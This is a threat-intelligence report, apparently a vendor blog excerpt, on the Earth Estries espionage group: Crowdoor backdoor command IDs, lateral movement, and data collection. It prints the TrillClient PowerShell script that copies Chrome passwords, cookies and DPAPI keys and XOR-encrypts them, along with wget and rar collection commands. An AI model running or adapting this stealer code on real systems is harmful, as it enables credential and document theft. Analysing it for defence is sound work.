Breaking Down Earth Estries’ Persistent TTPs in Prolonged Cyber Operations

Crowdoor will perform different actions based on the corresponding argument. In table 1, we summarize the behaviors exhibited by the new Crowdoor variant based on the arguments used. Overall, the behaviors are similar to the ones seen in the older variant, with the difference being the injected process (msiexec.exe) and Command IDs (shown in table 2)

Arguments Action
No argument Persistence is set through the registry Run key or a service and the backdoor is restarted
0 Persistence is set through the registry Run key or a service and the backdoor is restarted.
1 The backdoor is restarted by injecting to ‘msiexec.exe’
2 The backdoor main function is called

Table 1. List of arguments and their corresponding actions

Old Crowdoor variant New Crowdoor variant Functions
0x2347135 0x11736212 Initial connection C2
0x2347136 0x11736213 Collect ComputerName,Username, OS version and hostnet or IP information
0x2347137 0x11736214 Remote shell
0x234713B 0x11736218 Delete malware files, persistence and exit
0x2347140 0x1173621D File related Operation
0x2347141 0x1173621E Open/ReadFile
0x2347142 0x1173621F Open/WriteFile
0x2347144 0x11736221 Collect drive information
0x2347145 0x11736222 Search File
0x2347148 0x11736225 CreateDirectory
0x2347149 0x11736226 Rename file or directory
0x234714A 0x11736227 Delete file or Directory
0x234714A 0x11736228 Communication with C&C server 

Table 2. Comparison between old and new Crowdoor variants

Package 1 Package 2 Package 3 Package 4
WinStore.exe (Host) K7Sysmon.exe (Host) HxTsk.exe (Host) MsMsRng.exe (Host)
Sqlite3.dll K7Sysmn1.dll d3d8.dll sqlite3.dll
datastate.dll K7Sysmn2.dll HxTsk (encrypted) msimg32.dll
datast.dll K7Sysmn3.dll   datastate.dll
WinStore (encrypted) K7Sysmon.dll (encrypted)   MsMsRng (encrypted)

Table 3. Crowdoor packages

Lateral Movement

Earth Estries uses PSExec to laterally install its backdoors and tools, notably by copying the CAB files containing the backdoors or tools, and a batch file to perform the installation, maintain persistence, and execute the tools.

Typically, PSExec is used to copy the CAB file containing the malware that will be laterally installed. However,in some instances, WMIC may be used in its place to achieve similar results. A set of batch files will then be copied and executed to perform the extraction, installation, and execution of the malware. Large scale collection may also be executed using batch files.

In later stages of the attack, the backdoors may be used directly to perform lateral movement. CAB files are still used as containers for the tools to be installed, and batch files are still incorporated in the extraction, installation and execution of said tools. This will sometimes include the creation of persistence mechanisms for the batch file to act as an indirect persistence mechanism for the actual backdoors.

Discovery, collection and exfiltration

TrillClient’s user credential discovery

Earth Estries will collect user credentials that can be used to further its objectives. The threat actor employs the TrillClient information stealer for this routine, primarily collecting user credentials from browser user profiles. TrillClient launches a PowerShelll script that will collect user profiles to be saved at a specific location:

foreach($win_user_path in $users_path){

echo D | xcopy \”C:\Users\$win_user_path\AppData\Roaming\Microsoft\Protect\” \”$copy_dest_path\$win_user_path\Protect\” /E /C /H;

attrib -a -s -r -h \”$copy_dest_path\$win_user_path\*\” /S /D;

echo F | xcopy \”C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Local State\” \”$copy_dest_path\$win_user_path\Local State\” /C;

echo F | xcopy \”C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies\” \”$copy_dest_path\$win_user_path\Default\Network\Cookies\” /C

echo F | xcopy \”C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Login Data\” \”$copy_dest_path\$win_user_path\Default\Login Data\” /C;

$profile_path = Get-ChildItem -Name \”C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\\\” -Include *Profile* -ErrorAction SilentlyContinue;

foreach($chrome_user_path in $profile_path){

echo F | xcopy \”C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\$chrome_user_path\Network\Cookies\” \”$copy_dest_path\$win_user_path\$chrome_user_path\Network\Cookies\” /C;

echo F | xcopy \“C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\$chrome_user_path\Login Data\” \”$copy_dest_path\$win_user_path\$chrome_user_path\Login Data\” /C;

   }
}

Data will be collected from the following folders:

  • %LOCALAPPDATA%\Google\Chrome\User Data\Local State
  • %LOCALAPPDATA%\Google\Chrome\User Data\<PROFILE>\Login Data
  • %LOCALAPPDATA%\Google\Chrome\User Data\<PROFILE>\Network\Cookies
  • %APPDATA%\Microsoft\Protect\*

The collected data will be temporarily copied to <%TEMP%\browser_temp_data<RANDOM>>, archived using the tar command, and encrypted with an XOR algorithm.

tar -cvf \”$copy_dest_path\tar\” $copy_dest_path;

$e_a = [System.IO.File]::ReadAllBytes(\”$copy_dest_path\tar\”);Remove-Item -Path $copy_dest_path -Recurse;

$e_i = 0;foreach($e_c in $e_a){$e_a[$e_i] = (($e_c -bxor ($e_i % 252)) -bxor (0xe6 – ($e_i % 199)));$e_i += 1;

$random_filename = \”300775736611547784207972935122149919289871693\”;

$out_put_file = $out_put_path + \”\\\” + $random_filename;

echo $out_put_file;

[System.IO.File]::WriteAllBytes($out_put_file, $e_a);

The collected data will then be sent to the threat actor’s Gmail account over Simple Mail Transfer Protocol (SMTP).

Collection of sensitive documents

Earth Estries utilizes RAR for collecting information of interest. On this attack scenario, they utilize wget to download target documents from an internal web-based document management platform to a collection folder before archiving them.

  • In this instance, a batch file containing commands to download PDF files to the collection directory is executed, containing hardcoded document names:
    • c:\users\public\music\temp\wget.exe -c “hxxp://172.16.xx.xx/{document path}/{Hardcoded Filename}.pdf” -P c:\users\public\music\temp
  • Afterwards, collected PDF’s are archived
    • C:\Windows\system32\cmd.exe /C C:\Users\Public\Music\rar.exe a -m5 C:\Users\Public\Music\pdf0412.rar C:\Users\Public\Music\temp\*.pdf

Collection via backdoor

Earth Estries uses both Crowdoor and Cobalt Strike installations for collection routines by archiving information of interest both from both local and remote locations. Some examples of collection commands performed are as follows:

Example command Functions
rar.exe  a -m5 <install path>\322.rar \\<remote machine>\c$\<remote path> Collect Gather information collected by an older generation of infection from a remote machine
rar.exe  a -m5 <install path> \his231.rar “C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\History” Collect browser history files, which are of. Of interest to the attackers to be able to compromise more credentials
rar.exe  a <install path>\0311.rar C:\users\<user name>\Desktop\* C:\users\ <user name> \Downloads\* C:\users\ <user name> \Documents\* -r -y -ta<cutoff date> Collection ofCollect more recent files and/or documents interacted with by a local user

Table 4. Collection commands

Telemetry suggests that they were exfiltrated through the same methods that the collection command is executed: either through the command-and-control (C&C) channels of their backdoors, or through the same initial access method used to control these tools.

An overview of the second Earth Estries attack flow is shown in figure 3:

Read More HERE